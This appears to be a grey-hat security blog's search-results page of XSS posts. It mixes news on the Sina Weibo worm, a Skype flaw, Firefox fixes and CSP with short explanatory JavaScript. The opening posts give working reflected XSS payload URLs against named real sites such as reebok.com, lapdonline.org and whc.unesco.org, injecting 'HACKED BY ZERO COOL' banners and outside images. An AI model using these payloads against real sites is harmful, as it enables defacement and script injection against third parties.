Showing posts sorted by relevance for query XSS. Sort by date Show all posts

XSS in UK Gov sites found by Zero Cool


XSS vulnerability found by Zero Cool on (reebok, indiagames, mtv, lapdonline, unesco, pcboard)

XSS vulnerability found by Zero Cool on:
reebok.com
bsnl1.indiagames.com
www.lapdonline.org
whc.unesco.org
cricket.com.au




http://www.reebok.com/IN/search?t=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20ZERO%20COOL%3C/MARQUEE%3E%3Ciframe+src+%3D%22http://www.voiceofgreyhat.com/2011/04/xss-vulnerability-found-by-zero-cool.html%22+width%3D%22100%25%22+height%3D%22100%25%22%3E%3C%2Fiframe%3E&Submit=Go




http://bsnl1.indiagames.com/bpremium/index.jsp  


vul link= [put the code in the search bar] >"><MARQUEE>HACKED BY ZERO COOL</MARQUEE><img src="http://img204.imageshack.us/img204/1322/zeropk.png" img>




http://www.lapdonline.org/ 


vul link=  http://www.lapdonline.org/search_results/search/&view_all=1&chg_filter=1&searchType=content_basic&search_terms=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20ZERO%20COOL%3C/MARQUEE%3E%3Cimg%20src=%22http://img204.imageshack.us/img204/1322/zeropk.png%22%20img%3E




http://www.mtv.co.uk/


vul link = http://www.mtv.co.uk/search?k=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20ZERO%20COOL%3C/MARQUEE%3E%3Cimg%20src=%22http://img204.imageshack.us/img204/1322/zeropk.png%22%20img%3E&op=Search




http://www.pcboard.com.pk/
vul link=  [put the code in the search bar] >"><MARQUEE>HACKED BY ZERO COOL</MARQUEE><img src="http://img204.imageshack.us/img204/1322/zeropk.png" img>




http://whc.unesco.org/


vul link =http://whc.unesco.org/en/list/?search=%3E%22%3E%3CMARQUEE%3EHACKED+BY+ZERO+COOL%3C%2FMARQUEE%3E%3Cimg+src%3D%22http%3A%2F%2Fimg204.imageshack.us%2Fimg204%2F1322%2Fzeropk.png%22+img%3E&searchSites=&search_by_country=&search_yearinscribed=&type=&themes=&media=&region=&criteria_restrication=&order=


HTML injection vulnerability in cricket.com.au, also found by Zero Cool




http://cricket.com.au/searchresult/%3Cimg%20src=%22http://fc09.deviantart.net/fs30/i/2009/252/e/e/Zero_Wallpaper_4_by_Zero1122.jpg%22%20%3C/img%3E


XSS Vulnerability Found On linux.com


XSS in Bangladesh Bank's Website


Non-persistent XSS in www.bangladesh-bank.org found by XSS master Zero Cool.


XSS Worm on Chinese Twitter

Users of Sina Weibo, the Chinese Twitter alternative, were targeted by a cross-site scripting (XSS) worm spreading through a vulnerability on the microblogging site.
With over 140 million users, Sina Weibo is the most popular social networking site in China, a country where both Twitter and Facebook are banned. The site's administrators announced that a worm exploiting an XSS weakness hit the platform on Tuesday evening. The worm propagated through messages that lured users with videos, pictures and software. For example, some advertised bloopers from a new film, while others advertised nude pictures of Chinese actress Fan Bingbing. Clicking on the included links forced users to re-post the spam messages from their own accounts, thereby helping the worm spread.
The attack was apparently launched from an account called @hellosamy, a name possibly chosen as a tribute to the Samy (Spacehero) worm released on MySpace back in 2005.
The work of security enthusiast Samy Kamkar, Spacehero was the first large-scale worm to spread on a social network by exploiting a cross-site scripting vulnerability and paved the way for many similar attacks that have occurred since then.
There is barely any social network left that hasn't been affected by such a worm. Some of them have had to deal with such problems multiple times and on some occasions the attacks distributed malware or spam.

There doesn't seem to have been any malicious component behind the Weibo worm, though, except for its spreading mechanism.

When such attacks happen, if webmasters are not quick enough, there is a high risk that the worms will mutate as other users modify the code and launch their own versions. In this case, the Weibo staff plugged the hole in around one hour, which is a rather long time for such an attack.

-News Source (Softpedia)


XSS Vulnerability on bluedart (found by soumyabrata)


An XSS vulnerability on bluedart has been found by soumyabrata.
He said that the search box is vulnerable to DOM-based XSS.

vulnerable website:-


SQL & XSS Vulnerability Found on Facebook Application




Zero strikes again, and again the victim is Facebook. This time he found SQL injection (SQL-i) and XSS vulnerabilities in 2 Facebook applications.

The 2 affected applications are:-

1. Ebook
2. ireadit 

SQL-i vulnerability on Ebook Application


Link:-
http://apps.facebook.com/ebokapp/


XSS Vulnerability on ireadit Application

Link:-
http://apps.facebook.com/ireadit/


Skype is Still Vulnerable

 
An Armenian hacker is claiming that Skype has failed to learn from prior security lessons, falling victim to a cross-site scripting (XSS) vulnerability similar to one it patched in May, which would allow users to redirect victims to unwanted websites or run arbitrary code.  The May vulnerability allowed users to fool the Mac client of Skype into running arbitrary code as the client didn't check, or sanitise, instant messages to ensure they were free of malicious code.

While Skype issued a low-priority patch at the time, a 28-year-old Armenian-based security engineer, Levent "noptrix" Kayan, claimed on Wednesday night that a similar XSS vulnerability existed elsewhere in Skype's software. He said that the failure to sanitise certain user information or the output rendered in Skype clients could still allow code to be executed.

In particular, Kayan claimed that he could see remote users' session information, which he said a malicious user could utilise to masquerade as the remote user and make calls on their account. He also said it could be used to take advantage of other holes, possibly allowing full control over the PC. Both of the latest versions of Windows and Mac clients are affected.
He said: "An attacker would need to [submit] malicious code. The victim doesn't have to do anything. He will be attacked, when he just logs into his account."
Skype said the vulnerability was considered a minor issue and that it had developed a fix for it which would be deployed next week.
Skype's head of information security, Adrian Asher, said that in order to exploit this, a person would have to be a validated contact of yours and one of the most frequent people you are in contact with and was therefore very unlikely to cause any issues in the real world. Nevertheless, he said the vulnerability shouldn't have existed and it would be fixed.
Additionally, Skype said that the session information that Kayan had been able to access was in relation to the web session IDs and not Skype IDs, suggesting that the attacker couldn't make calls using the exploit. It did, however, concede that it was possible for a victim's contacts to redirect them to any website using the web browser built into the Skype client, but stressed that only validated contacts would be able to do so. In the meantime, it said users should not authorise people they do not know and/or do not want to talk to.
HackLabs director Chris Gatford said that it was common to come across these sorts of vulnerabilities in the penetration testing of client systems that his company does.
"I would suggest that 80 per cent, perhaps even 90 per cent of the time, cross-site scripting vulnerabilities are present," he said.
Gatford mentioned the previous XSS vulnerability in the Skype client and thought that it was surprising that Skype had not patched all of its input validation problems when it was previously brought to its attention. "This would be a simple fix for them. To be honest, I'm kind of surprised they didn't learn their lesson the first time and extend the fix system-wide then."

-News Source (ZDNet)




Mozilla Fixed Cross Site Scripting (XSS) Flaws & Released Firefox Version 16.0.2


A serious security hole in Mozilla Firefox has been fixed. Mozilla has announced the availability of Firefox version 16.0.2, an emergency update to address a serious flaw in the way the browser treats the Location object. According to the advisory, successful exploitation of this flaw can result in cross-site scripting or code execution. The bug was first discovered by security researcher Mariusz Mlynski, and it forced Mozilla developers to release the third emergency fix in a month since the introduction of version 16 of the popular browser. According to the Mozilla Foundation Security Advisories, Mozilla has fixed a number of issues related to the Location object in order to enhance overall security. Along with Firefox 16.0.2, the security bug has also been fixed in Firefox ESR 10.0.10, Thunderbird 16.0.2, Thunderbird ESR 10.0.10 and SeaMonkey 2.13.2.

Security researcher Mariusz Mlynski reported that the true value of window.location could be shadowed by user content through the use of the valueOf method, which can be combined with some plugins to perform a cross-site scripting (XSS) attack on users. There is also the possibility of gaining arbitrary code execution if the attacker can take advantage of an add-on that interacts with the page content. Security researcher Antoine Delignat-Lavaud of the PROSECCO research team at INRIA Paris reported the ability to use property injection by prototype to bypass security wrapper protections on the Location object, allowing the cross-origin reading of the Location object.

Users running older versions of Firefox are advised to update immediately using the auto-update feature built into the browser.





NASA, Sony, Adidas, SPIKE TV & Few Other Govt Websites Are Vulnerable - Said "TeamHav0k"

A newly formed hacker group named "TeamHav0k" continues its Operation XSS (#OPXSS). As before, they have found cross-site scripting vulnerabilities in many high-profile websites. This time NASA, adidas Official Store, SPIKE TV Official Site, Brighton & Hove City Council, Air Accident Investigation Branch [Govt of UK] and Portal and Information Services of Tocantins [Govt of Brazil] became the victims. In a pastebin release the hacker group claimed that, using the vulnerabilities, an attacker can perform cookie stealing, XSS & XSSF tunneling and similar attacks, which can indeed cause serious harm to the vulnerable sites. They also found a redirection vulnerability on the official website of Sony Global Headquarters, which was later patched.
Earlier, TeamHav0k found XSS vulnerabilities in the official sites of Huffingtonpost, EA, IGN, NYTimes & many others.





DOM Snitch XSS Testing Tool by Google



Google has released a Chrome extension that is capable of checking client-side code for cross-site scripting weaknesses and other security issues. Called DOM Snitch, the still-experimental extension intercepts JavaScript calls to potentially dangerous functions like document.write, document.cookie, HTMLElement.innerHTML and others. It records a complete stack trace allowing the user to determine if the calls can lead to cross-site scripting, mixed content, violations of the same-origin DOM policy and other issues. "DOM Snitch is intended for use by developers, testers, and security researchers alike," says Radoslav Vasilev, a Google security test engineer. The benefits of DOM Snitch include the ability to inspect DOM modifications in real-time without the need of debuggers, built-in security heuristics and nested views, as well as export capability. The easy exporting of captured DOM modifications enables developers to ask for help from their peers when troubleshooting issues. DOM Snitch is not the only security tool released by Google for developers. Its open source Skipfish and Ratproxy web application vulnerability scanners are also capable of detecting XSS, XSRF and other flaws.
JavaScript is a critical component in many web attacks, both client-side and server-side. It is used in most drive-by exploits, as well as to obfuscate malicious code on compromised websites. There are several types of cross-site scripting vulnerabilities. Persistent ones are the most dangerous because they can be exploited to insert rogue code into pages permanently. Non-persistent or reflected ones can only be exploited by tricking users into opening malformed URLs.
DOM-based XSS flaws like the ones DOM Snitch helps identify are more complicated and can be exploited to load non-HTML code from a server or write code into the page directly on the client-side.
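The interception technique described above can be sketched in a few lines. This is an added example, not DOM Snitch's code: `instrumentSink`, the stub page objects and the heuristic regex are hypothetical, and the stub stands in for a real `document` so the block runs outside a browser.

```javascript
// Wrap a sink (a method or a property setter) so that every use is logged
// with a stack trace and then passed through to the original unchanged.
function instrumentSink(target, name, log) {
  // Locate the property descriptor on the object or its prototype chain.
  let owner = target;
  let desc;
  while (owner && !(desc = Object.getOwnPropertyDescriptor(owner, name))) {
    owner = Object.getPrototypeOf(owner);
  }
  if (!desc) throw new Error('no such property: ' + name);

  const record = (value) => log.push({
    sink: name,
    value: String(value),
    // Hypothetical heuristic: markup that can execute script.
    suspicious: /<script\b|\bon\w+\s*=|javascript:/i.test(String(value)),
    // Drop the "Error" line and this helper's own frame.
    stack: new Error().stack.split('\n').slice(2).join('\n'),
  });

  if (typeof desc.value === 'function') {
    const original = desc.value;
    Object.defineProperty(target, name, {
      configurable: true, writable: true,
      value: function (...args) { record(args.join('')); return original.apply(this, args); },
    });
  } else if (desc.set) {
    Object.defineProperty(target, name, {
      configurable: true, enumerable: desc.enumerable, get: desc.get,
      set: function (v) { record(v); desc.set.call(this, v); },
    });
  } else {
    throw new Error('property cannot be intercepted: ' + name);
  }
}

// Constructed stand-ins for document.write and HTMLElement.innerHTML.
function makeStubPage() {
  const state = { written: [], html: '' };
  const doc = { write(markup) { state.written.push(markup); } };
  const el = {
    get innerHTML() { return state.html; },
    set innerHTML(v) { state.html = v; },
  };
  return { doc, el, state };
}

function demoSinkLog() {
  const log = [];
  const { doc, el, state } = makeStubPage();
  instrumentSink(doc, 'write', log);
  instrumentSink(el, 'innerHTML', log);
  const untrusted = '<img src=x onerror=alert(1)>'; // constructed sample input
  doc.write('<p>static banner</p>');                // benign, still logged
  el.innerHTML = 'Results for ' + untrusted;        // untrusted data reaches an HTML sink
  return { log, state };
}
```

In a browser the same wrapper could be pointed at `Element.prototype` and `'innerHTML'` during testing; the stack trace in each log entry shows which script wrote to the sink.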

For More Info and to Download Click HERE


Firefox 4 Supports Content Security Policy


Content Security Policy is a standard developed by Mozilla designed to protect against cross-site scripting (XSS) attacks. Cross-site scripting attacks use vulnerabilities in websites to inject JavaScript code into pages or URLs of that site. The injected JavaScript code is then executed when visitors open a specifically prepared link or page on the website. Attacks can have serious consequences; it may for instance be possible to steal cookies from users to impersonate them on the site.
Content Security Policy has been in development for quite some time. The basic idea behind the standard is to give webmasters a tool to whitelist JavaScript, and other objects and files, that may be executed on the site. This implementation blocks all JavaScript code that is executed on the site and not in the list of allowed sites, which means that attackers cannot exploit possible XSS vulnerabilities on the website or server.
A browser supporting CSP ignores code that is not in the whitelist. Browsers that do not support CSP ignore the policy.

Content Security Protection for Users

CSP is currently only supported by Firefox 4, Thunderbird 3.3 and SeaMonkey 2.1. You can test the functionality by visiting this test page.
Twitter recently announced that they have added CSP to their mobile version, accessible under mobile.twitter.com. Users who use one of the aforementioned browsers are protected from XSS attacks on that website.
The engineers at Twitter removed all JavaScript from the code and implemented the CSP header. They then restricted the header to Firefox 4 users and created a rule set to allow JavaScript from their assets. This included the content delivery network used to deliver stylesheets and user profiles.
Unexpected issues were encountered by the developers. They noticed for instance that some Firefox add-ons were inserting JavaScript on page load, which triggered a threat report. The Twitter engineers noticed furthermore that some ISPs inserted JavaScript code or altered image tags for caching reasons.
They managed to resolve those problems by mandating SSL for all Firefox 4 users who access the mobile Twitter web site.
x-content security policy
A test with Firebug shows that the mobile version of Twitter is indeed using the policy on site. Please note that Twitter makes a user agent check and is very restrictive about it. Firefox 5 or Firefox 6 users won’t get the policy currently.

Content Security Protection for Webmasters

Webmasters may have some work at hand to add support for CSP to their website. JavaScript code that is directly embedded in documents will not be executed anymore, which has several implications. Webmasters need to move the code to external JavaScript files.
Policies are specified with the X-Content-Security-Policy header. The header X-Content-Security-Policy: allow 'self' *.ghacks.net for instance allows JavaScript to be loaded from ghacks.net and all subdomains of ghacks.net.
The using CSP guide on Mozilla offers additional examples on how to set the right headers.
Browsers that do not support CSP ignore the header.
CSP offers two additional forms of protection. It mitigates clickjacking attacks. Clickjacking refers to directing a user’s mouse click to a target on another site. This is often done by using transparent frames on the original website.
Content Security Policy can also be used to mitigate packet sniffing attacks, as it allows the webmaster to specify the protocols that are allowed to be used. It is for instance possible to force HTTPS-only connections.
The CSP Policy directives are accessible here on Mozilla.
Besides the options already mentioned, there are parameters to specify the hosts from which images, media files, objects or fonts may be loaded.
Plugins are available for WordPress and Drupal that add the policy to supported websites automatically when activated.
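To make the whitelist decision concrete, here is a simplified model of how the `allow 'self' *.ghacks.net` policy from the article sorts script loads into allowed and blocked. It is an added example, not browser or Mozilla code; the function names and sample URLs are constructed, ports and paths in source expressions are ignored, and a source without a scheme is assumed to require the page's own scheme.

```javascript
// Simplified model of CSP source-list matching for scripts (assumptions above).
function parsePolicy(headerValue) {
  const directives = Object.create(null);
  for (const part of headerValue.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // This model keeps the first occurrence of a directive.
    if (!(name in directives)) directives[name] = tokens.slice(1);
  }
  return directives;
}

function hostMatches(pattern, host) {
  pattern = pattern.toLowerCase();
  host = host.toLowerCase();
  if (pattern === '*') return true;
  // "*.ghacks.net" is compared as the suffix ".ghacks.net", so a host that
  // merely ends in "ghacks.net" without the dot does not match.
  if (pattern.startsWith('*.')) return host.endsWith(pattern.slice(1));
  return pattern === host;
}

function sourceMatches(expr, src, page) {
  if (expr === "'none'") return false;
  if (expr === "'self'") return src.origin === page.origin;
  // Scheme-only source such as "https:".
  if (/^[a-z][a-z0-9+.-]*:$/i.test(expr)) return src.protocol === expr.toLowerCase();
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^\/:]+)/i.exec(expr);
  if (!m) return false;
  const scheme = m[1] ? m[1].toLowerCase() + ':' : page.protocol;
  return src.protocol === scheme && hostMatches(m[2], src.hostname);
}

// script is { inline: true } or { src: "<absolute or relative URL>" }.
function scriptAllowed(headerValue, pageUrl, script) {
  const policy = parsePolicy(headerValue);
  // "allow" is the catch-all in the X- header; "default-src" is the name
  // used by the standardized Content-Security-Policy header.
  const sources = policy['script-src'] || policy['allow'] || policy['default-src'];
  if (!sources) return true;        // no directive governs scripts
  if (script.inline) return false;  // embedded script is not executed
  const page = new URL(pageUrl);
  const src = new URL(script.src, pageUrl);
  return sources.some((expr) => sourceMatches(expr, src, page));
}

const POLICY = "allow 'self' *.ghacks.net";      // header value from the article
const PAGE = 'https://ghacks.net/some-article';  // constructed page URL

function demoDecisions() {
  return {
    sameOrigin: scriptAllowed(POLICY, PAGE, { src: '/js/site.js' }),
    subdomain: scriptAllowed(POLICY, PAGE, { src: 'https://cdn.ghacks.net/lib.js' }),
    lookalike: scriptAllowed(POLICY, PAGE, { src: 'https://ghacks.net.attacker.example/x.js' }),
    thirdParty: scriptAllowed(POLICY, PAGE, { src: 'https://attacker.example/x.js' }),
    injectedInline: scriptAllowed(POLICY, PAGE, { inline: true }),
  };
}
```

The last three cases are the ones that matter for XSS: an injected inline script or a script pulled from a host outside the list is refused even though the injection itself succeeded.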


Serious Vulnerabilities Found By Deepanker Verma on Online Shopping Website


Serious Vulnerabilities Found By Deepanker Verma on shopping.indiatimes.com
 

Vulnerable Website:-
http://shopping.indiatimes.com/

According To the Hacker:-


"IndiaTimes shopping website has some serious XSS vulnerabilities which can lead to cookie stealing of users. And this may cause some serious loss to users. After going through some pages of the website, we (Shadab and me ) have found that the website is vulnerable to XSS injections and malicious scripts can be injected on the website."

Here are some screen shots submitted by the hacker to prove the vulnerability:-


 XSS on the login Page 


JavaScript Injection Vulnerability


Vulnerability on the product page 


Cookie Stealing Vulnerability


iframe vulnerability

The screenshots above clearly show that this website is vulnerable and has many loopholes; a black hat could also inject malicious code and do serious harm.


Official Website of National Geographic is Vulnerable

A vulnerability has been found by an Indian hacker named Akshay, AKA 0z0n3, in the official website of National Geographic. According to the hacker, Nat Geo is vulnerable to non-persistent XSS. The vulnerability has also been reported to Nat Geo, but its status is still unfixed. To know the vulnerable link click here. We would also like to remind you that earlier in 2011 another Indian hacker named Zero found XSS in the official website of Discovery.com.
Brief about National Geographic: National Geographic, commercially abbreviated and trademarked as Nat Geo, is a subscription television channel that airs non-fiction television programs produced by the National Geographic Society. Like History and the Discovery Channel, the channel features documentaries with factual content involving nature, science, culture, and history. The channel is owned primarily by Fox Cable Networks, a division of News Corporation. Its primary sister network worldwide, including the United States.



Two Young Researchers Found Vulnerability in Microsoft Windows Live Which Could Lead ID-Theft

Two Young Researchers Found Security Flaws in Microsoft Windows Live Which Could Lead Identity Theft
Recently two young security researchers from Morocco, Abdeljalil S'hit and Yasser Aboukir, discovered a serious vulnerability in Microsoft's Windows Live service. The vulnerability has been reported to Microsoft, but unfortunately the software giant neither gave compensation nor made any comment on the matter. In a report, ZDNet said the vulnerability in question leveraged Cross-Site Scripting (XSS) to execute a malicious script.

More specifically, the two researchers managed to cause an error on the Windows Live login page (as you can see above), and once the victim clicked on the "Continue" button, their malicious script would be executed. The XSS flaw means that an attacker could impersonate a Windows Live user by gaining full control of the victim's cookies. Combined with social engineering, this technique could be used to steal a victim's Windows Live identity with ease.

The last update we got from Microsoft is saying - "We quickly addressed the vulnerability in question to help keep customers protected and appreciate the researchers using Coordinated Vulnerability Disclosure to assist in us working toward a fix in a coordinated manner"







XSS Vulnerability Found By Hitcher on the Official Website of Tom Cruise & Delhi Chamber Of Commerce


Pakistani Hacker Hitcher found non-persistent XSS Vulnerability on the Official Website of Famous Hollywood Actor Tom Cruise and also on the Delhi Chamber Of Commerce website.

Tom Cruise:-

Vulnerable Website:-
 

Vulnerable Link:-


 
Delhi Chamber Of Commerce:-

Vulnerable Website:-

Vulnerable Link:-


XSS Vulnerability Found By Konvic Jack On windowsitpro.com


Non-persistent XSS vulnerability found by Konvic Jack on the official website windowsitpro.com

About Windows It Pro:- 
Windows IT Pro is the leading independent community for IT professionals deploying Microsoft Windows server and client applications and technologies.

Vulnerable Site:-
http://www.windowsitpro.com/

Vulnerable Link:-

